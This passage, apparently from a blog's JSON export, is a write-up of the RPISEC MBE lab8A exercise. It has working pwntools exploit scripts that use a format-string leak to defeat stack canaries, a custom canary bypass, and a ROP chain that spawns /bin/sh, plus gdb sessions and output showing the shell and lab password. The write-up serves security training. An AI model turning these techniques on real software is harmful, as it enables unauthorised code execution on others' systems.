0x80\r\n\r\np.sendline(fmt)\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# third call to selectABook: overwrite return address\r\n\r\naddr_buf = 0x080b4f89                 # stack-pivot: add esp, 4; pop ebp; ret\r\naddr_write = stack_leak - 0xc - 0x214 # ret addr of 2nd call to selectABook\r\n\r\nvalue_u2 = addr_buf >> 16\r\nvalue_l2 = addr_buf & 0xffff\r\n\r\nfmt  = p32(addr_write+2) # arg selector: $1\r\nfmt += p32(addr_write)   # arg selector: $2\r\nfmt += "%" + str(value_u2 - 8) + "x"\r\nfmt += "%2$hn"\r\nfmt += "%" + str(value_l2 - value_u2) + "x"\r\nfmt += "%3$hn"\r\np.sendline(fmt)\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# fourth call to selectABook: valid input \/ trigger return\r\n\r\np.sendline("A")\r\np.recvuntil("biped? \\n")\r\n\r\np.interactive()\r\n<\/pre>\n
Running the script:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ python \/tmp\/exploit_lab8A.py\r\n[+] Opening connection to localhost on port 8841: Done\r\n[+] stack_leak: 0xbfebd390\r\n[*] Switching to interactive mode\r\n$ id\r\nuid=1032(lab8end) gid=1033(lab8end) groups=1033(lab8end),1001(gameuser)\r\n$ cat \/home\/lab8end\/.pass\r\nH4x0r5_d0nt_N33d_m3t4pHYS1c5\r\n<\/pre>\n
As we figured out, there is also a second buffer overflow vulnerability. Let’s try to exploit this vulnerability, too:<\/p>\n
buffer overflow (stack canary)<\/h2>\n
The function findSomeWords<\/code> contains a buffer overflow vulnerability:<\/p>\n
\r\n    char buf[24];\r\n<\/pre>\n
\r\n    read(STDIN, buf, 2048); \/\/ >> read a lot every day !\r\n<\/pre>\n
If we want to leverage this vulnerability to overwrite the return address and redirect the control flow, we have to bypass the deployed stack canary protections.<\/p>\n
When stack canaries are enabled, each function prologue contains the following additional instructions:<\/p>\n
\r\ngdb-peda$ disassemble findSomeWords\r\nDump of assembler code for function findSomeWords:\r\n   0x080490dd <+0>:     push   ebp\r\n   0x080490de <+1>:     mov    ebp,esp\r\n   0x080490e0 <+3>:     sub    esp,0x28\r\n   0x080490e3 <+6>:     mov    eax,gs:0x14\r\n   0x080490e9 <+12>:    mov    DWORD PTR [ebp-0x4],eax\r\n   ...\r\n<\/pre>\n
gs<\/code> is a segment register used for thread-local data. gs:0x14<\/code> contains the stack canary, which is stored on the stack right before the return address at ebp-0x4<\/code>.<\/p>\n
Before the ret<\/code> instruction in the function epilogue is executed, the stack canary on the stack is compared to the actual stack canary in gs:0x14<\/code>:<\/p>\n
\r\n   ...\r\n   0x08049168 <+139>:   mov    eax,DWORD PTR [ebp-0x4]\r\n   0x0804916b <+142>:   xor    eax,DWORD PTR gs:0x14\r\n   0x08049172 <+149>:   je     0x8049179 <findSomeWords+156>\r\n   0x08049174 <+151>:   call   0x806f490 <__stack_chk_fail>\r\n   0x08049179 <+156>:   leave\r\n   0x0804917a <+157>:   ret\r\n<\/pre>\n
If the canary on the stack is not equal with the actual canary, the je<\/code> will not be taken and the function __stack_chk_fail<\/code> will quit the program. This way the ret<\/code> instruction is never reached and a potentially overwritten return address will not be loaded to the instruction pointer.<\/p>\n
How can we bypass this protection? Well, we have already seen that the function selectABook<\/code> contains a format string vulnerability. Since the stack canary is the same for all function calls in the same thread, we can use this vulnerability to leak the stack canary.<\/p>\n
In order to do this, we just have to determine the argument selector we have to use in the format string to print a stack canary:<\/p>\n
\r\ngdb-peda$ disassemble selectABook\r\nDump of assembler code for function selectABook:\r\n   0x08048f0b <+0>:     push   ebp\r\n   0x08048f0c <+1>:     mov    ebp,esp\r\n   0x08048f0e <+3>:     sub    esp,0x20c\r\n   0x08048f14 <+9>:     mov    eax,gs:0x14\r\n   0x08048f1a <+15>:    mov    DWORD PTR [ebp-0x4],eax\r\n   0x08048f1d <+18>:    xor    eax,eax\r\n   0x08048f1f <+20>:    lea    eax,[ebp-0x204]\r\n   0x08048f25 <+26>:    mov    DWORD PTR [esp+0x4],eax\r\n   0x08048f29 <+30>:    mov    DWORD PTR [esp],0x80bf7cb\r\n   0x08048f30 <+37>:    call   0x804f550 <__isoc99_scanf>\r\n   0x08048f35 <+42>:    lea    eax,[ebp-0x204]\r\n   0x08048f3b <+48>:    mov    DWORD PTR [esp],eax\r\n   0x08048f3e <+51>:    call   0x804f4f0 <printf>\r\n   ...\r\nEnd of assembler dump.\r\ngdb-peda$ b *selectABook+15\r\nBreakpoint 1 at 0x8048f1a\r\ngdb-peda$ b *selectABook+51\r\nBreakpoint 2 at 0x8048f3e\r\n<\/pre>\n
I set a breakpoint after the stack canary has been loaded to eax<\/code> and another breakpoint when printf<\/code> is called in order to see at which offset from the current esp<\/code> the canary is stored:<\/p>\n
\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: [----------------------------------registers-----------------------------------]\r\nEAX: 0x285ea900\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xffffffff\r\nEDX: 0x80ed4d4 --> 0x0\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x80662a0 (<__stpcpy_ssse3>: mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff4d8 --> 0x0\r\nEIP: 0x8048f1a (<selectABook+15>:       mov    DWORD PTR [ebp-0x4],eax)\r\nEFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048f0c <selectABook+1>:   mov    ebp,esp\r\n   0x8048f0e <selectABook+3>:   sub    esp,0x20c\r\n   0x8048f14 <selectABook+9>:   mov    eax,gs:0x14\r\n=> 0x8048f1a <selectABook+15>:  mov    DWORD PTR [ebp-0x4],eax\r\n   0x8048f1d <selectABook+18>:  xor    eax,eax\r\n   0x8048f1f <selectABook+20>:  lea    eax,[ebp-0x204]\r\n   0x8048f25 <selectABook+26>:  mov    DWORD PTR [esp+0x4],eax\r\n   0x8048f29 <selectABook+30>:  mov    DWORD PTR [esp],0x80bf7cb\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff4d8 --> 0x0\r\n0004| 0xbffff4dc --> 0x0\r\n0008| 0xbffff4e0 --> 0x0\r\n0012| 0xbffff4e4 --> 0x0\r\n0016| 0xbffff4e8 --> 0x0\r\n0020| 0xbffff4ec --> 0x0\r\n0024| 0xbffff4f0 --> 0x0\r\n0028| 0xbffff4f4 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048f1a in selectABook ()\r\n<\/pre>\n
The canary being used is 0x285ea900<\/code>.<\/p>\n
\r\ngdb-peda$ c\r\nContinuing.\r\nAAAA\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff4e0 ("AAAA")\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0x80ed4e0 --> 0x0\r\nEDX: 0x1\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x80662a0 (<__stpcpy_ssse3>: mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff4d8 --> 0xbffff4e0 ("AAAA")\r\nEIP: 0x8048f3e (<selectABook+51>:       call   0x804f4f0 <printf>)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048f30 <selectABook+37>:  call   0x804f550 <__isoc99_scanf>\r\n   0x8048f35 <selectABook+42>:  lea    eax,[ebp-0x204]\r\n   0x8048f3b <selectABook+48>:  mov    DWORD PTR [esp],eax\r\n=> 0x8048f3e <selectABook+51>:  call   0x804f4f0 <printf>\r\n   0x8048f43 <selectABook+56>:  mov    DWORD PTR [esp+0x4],0x80bf7ce\r\n   0x8048f4b <selectABook+64>:  lea    eax,[ebp-0x204]\r\n   0x8048f51 <selectABook+70>:  mov    DWORD PTR [esp],eax\r\n   0x8048f54 <selectABook+73>:  call   0x8048280\r\nGuessed arguments:\r\narg[0]: 0xbffff4e0 ("AAAA")\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff4d8 --> 0xbffff4e0 ("AAAA")\r\n0004| 0xbffff4dc --> 0xbffff4e0 ("AAAA")\r\n0008| 0xbffff4e0 ("AAAA")\r\n0012| 0xbffff4e4 --> 0x0\r\n0016| 0xbffff4e8 --> 0x0\r\n0020| 0xbffff4ec --> 0x0\r\n0024| 0xbffff4f0 --> 0x0\r\n0028| 0xbffff4f4 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, 0x08048f3e in selectABook ()\r\ngdb-peda$ searchmem 0x285ea900\r\nSearching for '0x285ea900' in: None ranges\r\nFound 3 results, display max 3 items:\r\n [heap] : 0x80ef854 --> 0x285ea900\r\n[stack] : 0xbffff6e0 --> 0x285ea900\r\n[stack] : 0xbffff704 --> 0x285ea900\r\ngdb-peda$ p (0xbffff6e0 - 0xbffff4d8) \/ 4\r\n$1 = 0x82\r\n<\/pre>\n
There are two canaries on the stack. The offset to the second on can be calculated by subtracting the current esp<\/code> (0xbffff4d8<\/code>). Because we are going to use the 4-byte format specifier %p<\/code> we have to divide the difference by 4 to determine the argument selector we have to use. The value 0x82 = 130<\/code> means that we can print the stack canary with the format specifier %130$p<\/code>. Let’s verify this:<\/p>\n
\r\n   ...\r\n   0x08048f1a <+15>:    mov    DWORD PTR [ebp-0x4],eax\r\n   ...\r\nEnd of assembler dump.\r\ngdb-peda$ b *selectABook+15\r\nBreakpoint 1 at 0x8048f1a\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: [----------------------------------registers-----------------------------------]\r\nEAX: 0xdbeeeb00\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xffffffff\r\nEDX: 0x80ed4d4 --> 0x0\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x80662a0 (<__stpcpy_ssse3>: mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff4d8 --> 0x0\r\nEIP: 0x8048f1a (<selectABook+15>:       mov    DWORD PTR [ebp-0x4],eax)\r\nEFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x8048f0c <selectABook+1>:   mov    ebp,esp\r\n   0x8048f0e <selectABook+3>:   sub    esp,0x20c\r\n   0x8048f14 <selectABook+9>:   mov    eax,gs:0x14\r\n=> 0x8048f1a <selectABook+15>:  mov    DWORD PTR [ebp-0x4],eax\r\n   0x8048f1d <selectABook+18>:  xor    eax,eax\r\n   0x8048f1f <selectABook+20>:  lea    eax,[ebp-0x204]\r\n   0x8048f25 <selectABook+26>:  mov    DWORD PTR [esp+0x4],eax\r\n   0x8048f29 <selectABook+30>:  mov    DWORD PTR [esp],0x80bf7cb\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff4d8 --> 0x0\r\n0004| 0xbffff4dc --> 0x0\r\n0008| 0xbffff4e0 --> 0x0\r\n0012| 0xbffff4e4 --> 0x0\r\n0016| 0xbffff4e8 --> 0x0\r\n0020| 0xbffff4ec --> 0x0\r\n0024| 0xbffff4f0 --> 0x0\r\n0028| 0xbffff4f4 --> 0x0\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048f1a in selectABook ()\r\ngdb-peda$ c\r\nContinuing.\r\n%130$p\r\n0xdbeeeb00\r\n<\/pre>\n
We have successfully leaked the stack canary \ud83d\ude42<\/p>\n
As we have already seen an additional stack canary has been implemented within the function findSomeWords<\/code>:<\/p>\n
\r\n    if(((*( global_addr))^(*(global_addr_check))) != ((*( global_addr))^(0xdeadbeef))){\r\n        printf("\\n\\nWoah There\\n");\r\n        \/\/ why are you trying to break my program q-q\r\n        exit(EXIT_FAILURE);\r\n    }\r\n<\/pre>\n
The pointer global_addr<\/code> references the address right after the buffer buf<\/code>:<\/p>\n
\r\n    global_addr = (&buf+0x1);\r\n<\/pre>\n
And what is stored at this address? Right! The stack canary.<\/p>\n
The other pointer global_addr_check<\/code> references the address of buf+16<\/code>:<\/p>\n
\r\n    global_addr_check = global_addr-0x2;\r\n<\/pre>\n
This means that we have to make sure that at &buf[16]<\/code> the value \"\\xef\\xbe\\xad\\xde\"<\/code> is stored in order to bypass the custom canary protection.<\/p>\n
At last we have to determine the offset from the buffer to the return address. This can be done by setting a breakpoint at the beginning of findSomeWords<\/code> to see at which address the return address is stored and set another breakpoint at the call to read<\/code> to see where the buffer is stored:<\/p>\n
\r\ngdb-peda$ disassemble findSomeWords\r\nDump of assembler code for function findSomeWords:\r\n   0x080490dd <+0>:     push   ebp\r\n   ...\r\n   0x08049128 <+75>:    call   0x806d6d0 <read>\r\n   ...\r\nEnd of assembler dump.\r\ngdb-peda$ b *findSomeWords\r\nBreakpoint 1 at 0x80490dd\r\ngdb-peda$ b *findSomeWords+75\r\nBreakpoint 2 at 0x8049128\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8A\r\n\r\n\r\n\r\n**********************************************\r\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\r\n**********************************************\r\n\r\n        ==> reading is for everyone <==\r\n        [+] Enter Your Favorite Author's Last Name: A\r\nA\r\n\r\n*************************************************\r\n{|} Aristote's Metaphysics 350 B.C. Book VIII {|}\r\n*************************************************\r\n\r\nTo return to the difficulty which has been stated with respect both to definitions and to numbers, what is the cause of their unity? In the case of all things which have several parts and in which the totality is not, as it were, a mere heap, but the whole is something beside the parts, there is a cause; for even in bodies contact is the cause of unity in some cases, and in others viscosity or some other such quality. And a definition is a set of words which is one not by being connected together, like the Iliad, but by dealing with one object.-What then, is it that makes man one; why is he one and not many, e.g. animal + biped, especially if there are, as some say, an animal-itself and a biped-itself? Why are not those Forms themselves the man, so that men would exist by participation not in man, nor in-one Form, but in two, animal and biped, and in general man would be not one but more than one thing, animal and biped?\r\n\r\n...please turn to page 394...\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x1f\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0x80ed4d4 --> 0x0\r\nEDX: 0x1f\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x80662a0 (<__stpcpy_ssse3>: mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:       push   ebx)\r\nESP: 0xbffff6e8 --> 0x80491eb (<main+112>:      mov    DWORD PTR [esp],0x80c0993)\r\nEIP: 0x80490dd (<findSomeWords>:        push   ebp)\r\nEFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80490d6 <readC+77>:        call   0x806f490 <__stack_chk_fail>\r\n   0x80490db <readC+82>:        leave\r\n   0x80490dc <readC+83>:        ret\r\n=> 0x80490dd <findSomeWords>:   push   ebp\r\n   0x80490de <findSomeWords+1>: mov    ebp,esp\r\n   0x80490e0 <findSomeWords+3>: sub    esp,0x28\r\n   0x80490e3 <findSomeWords+6>: mov    eax,gs:0x14\r\n   0x80490e9 <findSomeWords+12>:        mov    DWORD PTR [ebp-0x4],eax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff6e8 --> 0x80491eb (<main+112>:     mov    DWORD PTR [esp],0x80c0993)\r\n0004| 0xbffff6ec --> 0x80c0974 ("\\n...please turn to page 394...")\r\n0008| 0xbffff6f0 --> 0x0\r\n0012| 0xbffff6f4 --> 0x2\r\n0016| 0xbffff6f8 --> 0x0\r\n0020| 0xbffff6fc --> 0xbffff794 --> 0xbffff8b6 ("\/levels\/lab08\/lab8A")\r\n0024| 0xbffff700 --> 0x1\r\n0028| 0xbffff704 --> 0x44d44700\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080490dd in findSomeWords ()\r\ngdb-peda$ c\r\nContinuing.\r\n\r\n..I like to read ^_^ <==  [----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff6c8 --> 0x804f510 (<printf+32>:     add    esp,0x1c)\r\nEBX: 0x80481a8 (<_init>:        push   ebx)\r\nECX: 0xffffffff\r\nEDX: 0x80ed4d4 --> 0x0\r\nESI: 0x0\r\nEDI: 0x80ec00c --> 0x80662a0 (<__stpcpy_ssse3>: mov    edx,DWORD PTR [esp+0x4])\r\nEBP: 0xbffff6e4 --> 0xbffff708 --> 0x8049990 (<__libc_csu_fini>:        push   ebx)\r\nESP: 0xbffff6bc --> 0x0\r\nEIP: 0x8049128 (<findSomeWords+75>:     call   0x806d6d0 <read>)\r\nEFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x804911a <findSomeWords+61>:        lea    eax,[ebp-0x1c]\r\n   0x804911d <findSomeWords+64>:        mov    DWORD PTR [esp+0x4],eax\r\n   0x8049121 <findSomeWords+68>:        mov    DWORD PTR [esp],0x0\r\n=> 0x8049128 <findSomeWords+75>:        call   0x806d6d0 <read>\r\n   0x804912d <findSomeWords+80>:        mov    eax,ds:0x80edf20\r\n   0x8049132 <findSomeWords+85>:        mov    edx,DWORD PTR [eax]\r\n   0x8049134 <findSomeWords+87>:        mov    eax,ds:0x80edf24\r\n   0x8049139 <findSomeWords+92>:        mov    eax,DWORD PTR [eax]\r\nGuessed arguments:\r\narg[0]: 0x0\r\narg[1]: 0xbffff6c8 --> 0x804f510 (<printf+32>:  add    esp,0x1c)\r\narg[2]: 0x800\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbffff6bc --> 0x0\r\n0004| 0xbffff6c0 --> 0xbffff6c8 --> 0x804f510 (<printf+32>:     add    esp,0x1c)\r\n0008| 0xbffff6c4 --> 0x800\r\n0012| 0xbffff6c8 --> 0x804f510 (<printf+32>:    add    esp,0x1c)\r\n0016| 0xbffff6cc --> 0x80ec200 --> 0xfbad2887\r\n0020| 0xbffff6d0 --> 0x80c0894 ('*' <repeats 46 times>, "\\n{|}  Welcome to QUEND's Beta-Book-Browser  {|}\\n", '*' <repeats 46 times>, "\\n\\n\\t==> reading is for everyone <==\\n\\t[+] Enter Your Favorite "...)\r\n0024| 0xbffff6d4 --> 0xbffff6f0 --> 0x0\r\n0028| 0xbffff6d8 --> 0x80481a8 (<_init>:        push   ebx)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, 0x08049128 in findSomeWords ()\r\ngdb-peda$ p 0xbffff6e8 - 0xbffff6c8\r\n$1 = 0x20\r\n<\/pre>\n
Thus the offset from the buffer buf<\/code> to the return address is 0x20 = 32 byte.<\/p>\n
Summing it up our second exploit will do the following:
\n–> Leak a stack address and the stack canary and store \"\/bin\/sh\"<\/code> on the stack using the function selectABook<\/code>.
\n–> Enter some valid input to trigger the function call to findSomeWords<\/code>.
\n–> Make sure the input contains the value 0xdeadbeef<\/code> at offset 16 to bypass the custom stack canary.
\n–> Append the leaked stack canary to bypass the default stack canary.
\n–> Append the ROP-chain we already used overwriting the return address with the address of the first gadget (this time no need for a pivoting gadget!).<\/p>\n
The final python-script for the second exploit:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ cat \/tmp\/exploit_lab8A_2.py\r\nfrom pwn import *\r\n\r\np = remote("localhost", 8841)\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# leak stack address & canary and store string \/bin\/sh\r\n\r\nfmt = "%p%130$p\/bin\/sh" # stack_leak & stack_canary + \/bin\/sh for later use\r\np.sendline(fmt)\r\nret = p.recv(1000)\r\nhexdump(ret)\r\nstack_leak = int(ret[0xe1:0xe9], 16)\r\nlog.success("stack_leak: " + hex(stack_leak))\r\nstack_can = int(ret[0xeb:0xf3], 16)\r\nlog.success("stack_canary: " + hex(stack_can))\r\naddr_binsh = stack_leak + 8\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# enter valid input in order to trigger findSomeWords\r\n\r\np.sendline("A")\r\np.recvuntil("..I like to read ^_^ <==  ")\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n# setup exploit\r\n\r\nexpl  = "A" * 16\r\nexpl += p32(0xdeadbeef) # custom stack canary\r\nexpl += "A" * 4\r\nexpl += p32(stack_can)  # default canary before saved ebp\r\nexpl += "A" * 4         # saved ebp\r\n                        # return address at offset 32\r\n\r\nexpl += p32(0x08054b45) # mov edx, 0xffffffff; ret\r\n\r\nexpl += p32(0x0807b8dc) # inc edx; adc al,0x39; ret\r\n\r\n                        # --> EDX = 0\r\n\r\nexpl += p32(0x08049c73) # xor ecx, ecx; pop ebx; mov eax, ecx;\r\n                        # pop esi; pop edi; pop ebp; ret\r\nexpl += p32(addr_binsh) #  -> ebx\r\nexpl += p32(0xdeadbeef) #  -> esi\r\nexpl += p32(0xdeadbeef) #  -> edi\r\nexpl += p32(0xdeadbeef) #  -> ebp\r\n\r\n                        # --> ECX = 0\r\n                        # --> EAX = 0\r\n                        # --> EBX = address of "\/bin\/sh"\r\n\r\nexpl += p32(0x08069443) # add eax, edi; pop edi; ret\r\nexpl += p32(0x2152411c) #  -> edi: 0xdeadbeef + 0x2152411c = 0x10000000b\r\n\r\nexpl += p32(0x08069443) # add eax, edi; pop edi; ret\r\nexpl += p32(0xdeadbeef) #  -> edi\r\n\r\n                        # --> EAX = 0xB\r\n\r\nexpl += p32(0x08048ef6) # int 0x80\r\n\r\np.sendline(expl)\r\n\r\np.interactive()\r\n<\/pre>\n
Running the script:<\/p>\n
\r\nlab8A@warzone:\/levels\/lab08$ python \/tmp\/exploit_lab8A_2.py\r\n[+] Opening connection to localhost on port 8841: Done\r\n[+] stack_leak: 0xbfa736c0\r\n[+] stack_canary: 0xc8b37100\r\n[*] Switching to interactive mode\r\n$ id\r\nuid=1032(lab8end) gid=1033(lab8end) groups=1033(lab8end),1001(gameuser)\r\n$ cat \/home\/lab8end\/.pass\r\nH4x0r5_d0nt_N33d_m3t4pHYS1c5\r\n<\/pre>\n
Done! The final password for this lab is H4x0r5_d0nt_N33d_m3t4pHYS1c5<\/code>.<\/p>\n","protected":false},"excerpt":{"rendered":"
While the last lab introduced the subject of Heap Exploitation, this lab focuses on Misc and Stack Cookies. The lab contains three levels again ranging from C to A: –> lab8C –> lab8B –> lab8A<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,7],"tags":[8,9,13,18,10,11,12,14],"class_list":["post-425","post","type-post","status-publish","format-standard","hentry","category-rpisec-mbe","category-writeup","tag-assembly","tag-binary","tag-elf","tag-gdb","tag-pwn","tag-r2","tag-reversing","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/425"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=425"}],"version-history":[{"count":8,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/425\/revisions"}],"predecessor-version":[{"id":433,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/425\/revisions\/433"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=425"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=425"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=425"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}